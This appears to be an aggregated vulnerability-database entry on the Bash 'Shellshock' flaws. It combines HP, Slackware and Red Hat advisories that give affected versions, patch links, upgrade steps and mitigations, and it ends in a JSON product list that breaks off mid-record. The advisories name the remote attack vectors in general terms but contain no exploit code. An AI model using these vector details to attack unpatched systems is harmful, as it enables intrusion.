3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX
Copyright 2015 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
This vulnerability allows users that have been granted access to a shell script to escalate privilege and execute unrestricted commands at the same security level as the Bash script.
Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+ patches/packages/bash-4.2.048-i486-2_slack14.1.txz: Rebuilt. Patched an additional trailing string processing vulnerability discovered by Tavis Ormandy. For more information, see: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169 ( Security fix ) +--------------------------+
Where to find the new packages: +-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated package for Slackware 13.0: ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/bash-3.1.018-i486-2_slack13.0.txz
Updated package for Slackware x86_64 13.0: ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/bash-3.1.018-x86_64-2_slack13.0.txz
Updated package for Slackware 13.1: ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/bash-4.1.012-i486-2_slack13.1.txz
Updated package for Slackware x86_64 13.1: ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/bash-4.1.012-x86_64-2_slack13.1.txz
Updated package for Slackware 13.37: ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/bash-4.1.012-i486-2_slack13.37.txz
Updated package for Slackware x86_64 13.37: ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/bash-4.1.012-x86_64-2_slack13.37.txz
Updated package for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/bash-4.2.048-i486-2_slack14.0.txz
Updated package for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/bash-4.2.048-x86_64-2_slack14.0.txz
Updated package for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/bash-4.2.048-i486-2_slack14.1.txz
Updated package for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/bash-4.2.048-x86_64-2_slack14.1.txz
Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/bash-4.3.025-i486-2.txz
Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/bash-4.3.025-x86_64-2.txz
MD5 signatures: +-------------+
Slackware 13.0 package: 93780575208505d17b5305b202294e16 bash-3.1.018-i486-2_slack13.0.txz
Slackware x86_64 13.0 package: 6ec269c8e958cd6265821b480af8e5d7 bash-3.1.018-x86_64-2_slack13.0.txz
Slackware 13.1 package: 21235413470903bb8eec907acb5b3248 bash-4.1.012-i486-2_slack13.1.txz
Slackware x86_64 13.1 package: e69bacaf484e8f924c09eacd91c8c737 bash-4.1.012-x86_64-2_slack13.1.txz
Slackware 13.37 package: fa05abe5c8d6557ec1cef124e5d877ce bash-4.1.012-i486-2_slack13.37.txz
Slackware x86_64 13.37 package: 97a0005c1e0701c8912dc30f8a6f2908 bash-4.1.012-x86_64-2_slack13.37.txz
Slackware 14.0 package: d319186a0ab7e85562684669afc878c3 bash-4.2.048-i486-2_slack14.0.txz
Slackware x86_64 14.0 package: 8835dc729d6029fc20b6b1b1df72ce13 bash-4.2.048-x86_64-2_slack14.0.txz
Slackware 14.1 package: fbb4b906de3a8f9bf5209fcc80e2a413 bash-4.2.048-i486-2_slack14.1.txz
Slackware x86_64 14.1 package: a786b69705d1ebb67fbf31df9d032699 bash-4.2.048-x86_64-2_slack14.1.txz
Slackware -current package: bba7e4260df8c4d91d99dbf13d44ec79 a/bash-4.3.025-i486-2.txz
Slackware x86_64 -current package: 7c9a285415bd636469da0cf405bb5692 a/bash-4.3.025-x86_64-2.txz
Installation instructions: +------------------------+
Upgrade the package as root:
upgradepkg bash-4.2.048-i486-2_slack14.1.txz
+-----+
Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com
+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address.
HP Product Firmware Version
HP StoreEver ESL G3 Tape Libraries with MCB version 2 680H_GS40701
HP StoreEver ESL G3 Tape Libraries with MCB version 1 656H_GS10801
The firmware is customer installable and is available in the Drivers, Software & Firmware section at the following location:
http://www.hp.com/support/eslg3
Notes:
- Updating the library firmware requires a reboot of the library.
Mitigation Instructions
HP recommends the following mitigation steps to reduce the risk of this vulnerability for HP StoreEver ESL G3 Tape Library. - The SSLv3 vulnerability known as "Padding Oracle on Downgraded Legacy Encryption" also known as "Poodle", which could be exploited remotely resulting in disclosure of information.
References: CVE-2014-0224 Heartbleed - Remote Unauthorized Access, Disclosure of Information
CVE-2014-3566 POODLE - Remote Disclosure of Information
CVE-2014-6271 Shellshock - Remote Code Execution
CVE-2014-7169 Shellshock - Remote Code Execution
SSRT101835
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP 3PAR Service Processor (SP) versions prior to SP-4.1.0.GA-97.P011, SP-4.2.0.GA-29.P003, and SP-4.3.0.GA-17.P001. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Important: bash security update Advisory ID: RHSA-2014:1311-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1311.html Issue date: 2014-09-26 CVE Names: CVE-2014-7169 CVE-2014-7186 CVE-2014-7187 =====================================================================
- Summary:
Updated bash packages that fix one security issue are now available for Red Hat Enterprise Linux 4 Extended Life Cycle Support, Red Hat Enterprise Linux 5.6 Long Life, Red Hat Enterprise Linux 5.9 Extended Update Support, Red Hat Enterprise Linux 6.2 Advanced Update Support, and Red Hat Enterprise Linux 6.4 Extended Update Support.
Red Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux AS (v. 4 ELS) - i386, ia64, x86_64 Red Hat Enterprise Linux AUS (v. 6.2 server) - x86_64 Red Hat Enterprise Linux Compute Node Optional EUS (v. 6.4) - x86_64 Red Hat Enterprise Linux ES (v. 4 ELS) - i386, x86_64 Red Hat Enterprise Linux EUS (v. 5.9 server) - i386, ia64, ppc, s390x, x86_64 Red Hat Enterprise Linux HPC Node EUS (v. 6.4) - x86_64 Red Hat Enterprise Linux LL (v. 5.6 server) - i386, ia64, x86_64 Red Hat Enterprise Linux Server EUS (v. 6.4) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional AUS (v. 6.2) - x86_64 Red Hat Enterprise Linux Server Optional EUS (v. 6.4) - i386, ppc64, s390x, x86_64
- Description:
The GNU Bourne Again shell (Bash) is a shell and command language interpreter compatible with the Bourne shell (sh). Bash is the default shell for Red Hat Enterprise Linux.
It was found that the fix for CVE-2014-6271 was incomplete, and Bash still allowed certain characters to be injected into other environments via specially crafted environment variables. An attacker could potentially use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue. (CVE-2014-7169)
Applications which directly create Bash functions as environment variables need to be made aware of the changes to the way names are handled by this update. For more information see the Knowledgebase article at https://access.redhat.com/articles/1200223
Note: Docker users are advised to use "yum update" within their containers, and to commit the resulting changes.
For additional information on CVE-2014-6271 and CVE-2014-7169, refer to the aforementioned Knowledgebase article.
All bash users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1146319 - CVE-2014-7169 bash: code execution via specially-crafted environment (Incomplete fix for CVE-2014-6271)
- Package List:
Red Hat Enterprise Linux AS (v. 4 ELS):
Source: bash-3.0-27.el4.4.src.rpm
i386: bash-3.0-27.el4.4.i386.rpm bash-debuginfo-3.0-27.el4.4.i386.rpm
ia64: bash-3.0-27.el4.4.i386.rpm bash-3.0-27.el4.4.ia64.rpm bash-debuginfo-3.0-27.el4.4.i386.rpm bash-debuginfo-3.0-27.el4.4.ia64.rpm
x86_64: bash-3.0-27.el4.4.x86_64.rpm bash-debuginfo-3.0-27.el4.4.x86_64.rpm
Red Hat Enterprise Linux ES (v. 4 ELS):
Source: bash-3.0-27.el4.4.src.rpm
i386: bash-3.0-27.el4.4.i386.rpm bash-debuginfo-3.0-27.el4.4.i386.rpm
x86_64: bash-3.0-27.el4.4.x86_64.rpm bash-debuginfo-3.0-27.el4.4.x86_64.rpm
Red Hat Enterprise Linux LL (v. 5.6 server):
Source: bash-3.2-24.el5_6.2.src.rpm
i386: bash-3.2-24.el5_6.2.i386.rpm bash-debuginfo-3.2-24.el5_6.2.i386.rpm
ia64: bash-3.2-24.el5_6.2.i386.rpm bash-3.2-24.el5_6.2.ia64.rpm bash-debuginfo-3.2-24.el5_6.2.i386.rpm bash-debuginfo-3.2-24.el5_6.2.ia64.rpm
x86_64: bash-3.2-24.el5_6.2.x86_64.rpm bash-debuginfo-3.2-24.el5_6.2.x86_64.rpm
Red Hat Enterprise Linux EUS (v. 5.9 server):
Source: bash-3.2-32.el5_9.3.src.rpm
i386: bash-3.2-32.el5_9.3.i386.rpm bash-debuginfo-3.2-32.el5_9.3.i386.rpm
ia64: bash-3.2-32.el5_9.3.i386.rpm bash-3.2-32.el5_9.3.ia64.rpm bash-debuginfo-3.2-32.el5_9.3.i386.rpm bash-debuginfo-3.2-32.el5_9.3.ia64.rpm
ppc: bash-3.2-32.el5_9.3.ppc.rpm bash-debuginfo-3.2-32.el5_9.3.ppc.rpm
s390x: bash-3.2-32.el5_9.3.s390x.rpm bash-debuginfo-3.2-32.el5_9.3.s390x.rpm
x86_64: bash-3.2-32.el5_9.3.x86_64.rpm bash-debuginfo-3.2-32.el5_9.3.x86_64.rpm
Red Hat Enterprise Linux HPC Node EUS (v. 6.4):
Source: bash-4.1.2-15.el6_4.2.src.rpm
x86_64: bash-4.1.2-15.el6_4.2.x86_64.rpm bash-debuginfo-4.1.2-15.el6_4.2.x86_64.rpm
Red Hat Enterprise Linux Compute Node Optional EUS (v. 6.4):
Source: bash-4.1.2-15.el6_4.2.src.rpm
x86_64: bash-debuginfo-4.1.2-15.el6_4.2.x86_64.rpm bash-doc-4.1.2-15.el6_4.2.x86_64.rpm
Red Hat Enterprise Linux AUS (v. 6.2 server):
Source: bash-4.1.2-9.el6_2.2.src.rpm
x86_64: bash-4.1.2-9.el6_2.2.x86_64.rpm bash-debuginfo-4.1.2-9.el6_2.2.x86_64.rpm
Red Hat Enterprise Linux Server EUS (v. 6.4):
Source: bash-4.1.2-15.el6_4.2.src.rpm
i386: bash-4.1.2-15.el6_4.2.i686.rpm bash-debuginfo-4.1.2-15.el6_4.2.i686.rpm
ppc64: bash-4.1.2-15.el6_4.2.ppc64.rpm bash-debuginfo-4.1.2-15.el6_4.2.ppc64.rpm
s390x: bash-4.1.2-15.el6_4.2.s390x.rpm bash-debuginfo-4.1.2-15.el6_4.2.s390x.rpm
x86_64: bash-4.1.2-15.el6_4.2.x86_64.rpm bash-debuginfo-4.1.2-15.el6_4.2.x86_64.rpm
Red Hat Enterprise Linux Server Optional AUS (v. 6.2):
Source: bash-4.1.2-9.el6_2.2.src.rpm
x86_64: bash-debuginfo-4.1.2-9.el6_2.2.x86_64.rpm bash-doc-4.1.2-9.el6_2.2.x86_64.rpm
Red Hat Enterprise Linux Server Optional EUS (v. 6.4):
Source: bash-4.1.2-15.el6_4.2.src.rpm
i386: bash-debuginfo-4.1.2-15.el6_4.2.i686.rpm bash-doc-4.1.2-15.el6_4.2.i686.rpm
ppc64: bash-debuginfo-4.1.2-15.el6_4.2.ppc64.rpm bash-doc-4.1.2-15.el6_4.2.ppc64.rpm
s390x: bash-debuginfo-4.1.2-15.el6_4.2.s390x.rpm bash-doc-4.1.2-15.el6_4.2.s390x.rpm
x86_64: bash-debuginfo-4.1.2-15.el6_4.2.x86_64.rpm bash-doc-4.1.2-15.el6_4.2.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package
- References:
https://www.redhat.com/security/data/cve/CVE-2014-7169.html https://www.redhat.com/security/data/cve/CVE-2014-7186.html https://www.redhat.com/security/data/cve/CVE-2014-7187.html https://access.redhat.com/security/updates/classification/#important https://access.redhat.com/articles/1200223
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2014 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFUJau9XlSAg2UNWIIRAhKkAKC931kAxA4S4exwT4uGhDr7uDFIKQCglKKS N0AJiOto/RXwBqHtbfr1wkM= =SeAK -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . Note: all versions of HP Thin Pro and HP Smart Zero Core operating systems prior to version 5.1.0 are affected by this vulnerability. Following is a complete list of affected operating systems.
HP ThinPro
HP ThinPro 5.0 (released June 2014) HP ThinPro 4.4 (released November 2013) HP ThinPro 4.3 (released June 2013) HP ThinPro 4.2 (released November 2012) HP ThinPro 4.1 (released March 2012) HP ThinPro 3.2 (released November 2010) HP ThinPro 3.1 (released June 2010) HP ThinPro 3.0 (released November 2009) HP ThinPro 2.0 (released 2009) HP ThinPro 1.5 (released 2009) HP ThinPro 1.0 (released 2008)
HP Smart Zero Core
HP Smart Zero Core 5.0 (released June 2014) HP Smart Zero Core 4.4 (released November 2013) HP Smart Zero Core 4.3 (released June 2013) HP Smart Zero Core 4.2 (released November 2012) HP Smart Zero Core 4.1 (released March 2012) HP Smart Zero Core 4.0 (released March 2011)
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2014-6271 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10 CVE-2014-7169 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has released the following software updates to resolve the vulnerability. If you participated in the ThinPro 5.1.0 beta program upgrade to the release version as soon as it becomes available. The update can be also downloaded directly from ftp://ftp.hp.com/pub/tcdebian /updates/5.0/service_packs/SecurityUpdate-CVE20146271-CVE20147169-all-5.0-x86 .xar Or via softpaq delivery at: ftp://ftp.hp.com/pub/softpaq/sp69001-69500/sp69071.exe
HP ThinPro and HP Smart Zero Core (x86) v4.4.x A component update is currently available through Easy Update as: SecurityUpdate-CVE20146271-CVE20147169-all-4.4-x86.xar . Or can be downloaded directly from ftp://ftp.hp.com/pub/tcdebian/updates/4.4/ service_packs/SecurityUpdate-CVE20146271-CVE20147169-all-4.4-x86.xar Or via softpaq delivery at: ftp://ftp.hp.com/pub/softpaq/sp69001-69500/sp69071.exe
HP ThinPro and HP Smart Zero Core (ARM) v4.4.x A component update is currently available through Easy Update as: SecurityUpdate-CVE20146271-CVE20147169-all-4.4-arm.xar .
NOTE: The vCAS product is vulnerable only if DHCP is enabled.
NOTE: HP recommends to not power-down or disconnect the vCAS until the update is available.
MITIGATION INFORMATION
A Shellshock attack requires the definition of an environment variable introduced into Bash. The vCAS has three attack vectors: SSH, the lighttpd web server, and the DHCP client.
- The exploit does not elevate privileges.
The DHCP client uses Bash scripts and is vulnerable to Shellshock. The DHCP exploit can be mitigated by ensuring that DHCP is disabled on the vCAS.
Note: HP strongly discourages the use of DHCP on the vCAS.
The web UI forces the vCAS user to assign a static IP address and change the hp-admin password. A vCAS user must manually configure DHCP for use on the vCAS.
A vCAS user can verify that DHCP is disabled by inspecting the file "/etc/network/interfaces" and ensuring that the "iface" line for device "eth0" is set for a static IP
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201409-1155", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "bash", "scope": "eq", "trust": 1.3, "vendor": "gnu", "version": "4.2" }, { "model": "bash", "scope": "eq", "trust": 1.3, "vendor": "gnu", "version": "3.2.48" }, { "model": "bash", "scope": "eq", "trust": 1.3, "vendor": "gnu", "version": "4.0" }, { "model": "bash", "scope": "eq", "trust": 1.3, "vendor": "gnu", "version": "3.2" }, { "model": "bash", "scope": "eq", "trust": 1.3, "vendor": "gnu", "version": "4.1" }, { "model": "bash", "scope": "eq", "trust": 1.3, "vendor": "gnu", "version": "4.3" }, { "model": "bash", "scope": "eq", "trust": 1.0, "vendor": "gnu", "version": "3.0.16" }, { "model": "bash", "scope": "eq", "trust": 1.0, "vendor": "gnu", "version": "2.0" }, { "model": "bash", "scope": "eq", "trust": 1.0, "vendor": "gnu", "version": "2.02" }, { "model": "bash", "scope": "eq", "trust": 1.0, "vendor": "gnu", "version": "1.14.7" }, { "model": "bash", "scope": "eq", "trust": 1.0, "vendor": "gnu", "version": "2.04" }, { "model": "bash", "scope": "eq", "trust": 1.0, "vendor": "gnu", "version": "1.14.1" }, { "model": "bash", "scope": "eq", "trust": 1.0, "vendor": "gnu", "version": "3.1" }, { "model": "bash", "scope": "eq", "trust": 1.0, "vendor": "gnu", "version": "2.03" }, { "model": "bash", "scope": "eq", "trust": 1.0, "vendor": "gnu", "version": "1.14.6" }, { "model": "bash", "scope": "eq", "trust": 1.0, "vendor": "gnu", "version": "1.14.5" }, { "model": "bash", "scope": "eq", "trust": 1.0, "vendor": "gnu", "version": "1.14.3" }, { "model": "bash", "scope": "eq", "trust": 1.0, "vendor": "gnu", "version": "1.14.0" }, { "model": "bash", "scope": "eq", "trust": 1.0, "vendor": "gnu", "version": "2.05" }, { "model": "bash", "scope": "eq", "trust": 1.0, "vendor": "gnu", "version": "2.01.1" }, { "model": "bash", "scope": "eq", "trust": 1.0, "vendor": "gnu", "version": "2.01" }, { "model": "bash", "scope": "eq", "trust": 1.0, "vendor": "gnu", "version": "2.02.1" }, { "model": "bash", "scope": "eq", "trust": 1.0, "vendor": "gnu", "version": "1.14.2" }, { "model": "bash", "scope": "eq", "trust": 1.0, "vendor": "gnu", "version": "1.14.4" }, { "model": "bash", "scope": "eq", "trust": 1.0, "vendor": "gnu", "version": "3.0" }, { "model": "manageone v100r002c10", "scope": null, "trust": 0.9, "vendor": "huawei", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "apple", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "avaya", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "barracuda", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "blue coat", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "centos", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "check point", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "cisco", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "cygwin", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "d link", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "debian gnu linux", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "dell computer", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "extreme", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "f5", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "fedora", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "fireeye", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "fortinet", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "gnu bash", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "gentoo linux", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "hewlett packard", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "ibm", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "juniper", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "mageia", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "mcafee", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "monroe", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "niksun", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "netapp", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "novell", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "oracle", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "palo alto", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "qnap security", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "red hat", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "suse linux", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "slackware linux", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "sophos", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "trend micro", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "ubuntu", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "vmware", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "xirrus", "version": null }, { "model": "manageone v100r002c00", "scope": null, "trust": 0.6, "vendor": "huawei", "version": null }, { "model": "unified contact center express", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "manageone v100r002c20", "scope": null, "trust": 0.6, "vendor": "huawei", "version": null }, { "model": "unity connection", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "paging server", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "smartcloud provisioning fixpack for sv", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1689.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.924.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1049.1" }, { "model": "oceanstor s5300 v100r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375127" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.77" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.31" }, { "model": "ucs invicta appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "secureplatform r75.30", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.71" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.51" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.166" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.891.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.15" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.306.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1012" }, { "model": "manageone v100r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "e9000 blade server ch220 v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1005.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.42" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6" }, { "model": "integration bus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1039" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "gaia embedded r75.47", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "aura communication manager sp5", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.67" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.434.0" }, { "model": "telepresence manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.702.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1311.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.687.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.78" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.365.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.879.0" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.74" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.317.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.92" }, { "model": "protectier appliance edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.926.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.47255" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.408.4" }, { "model": "chrome", "scope": "eq", "trust": 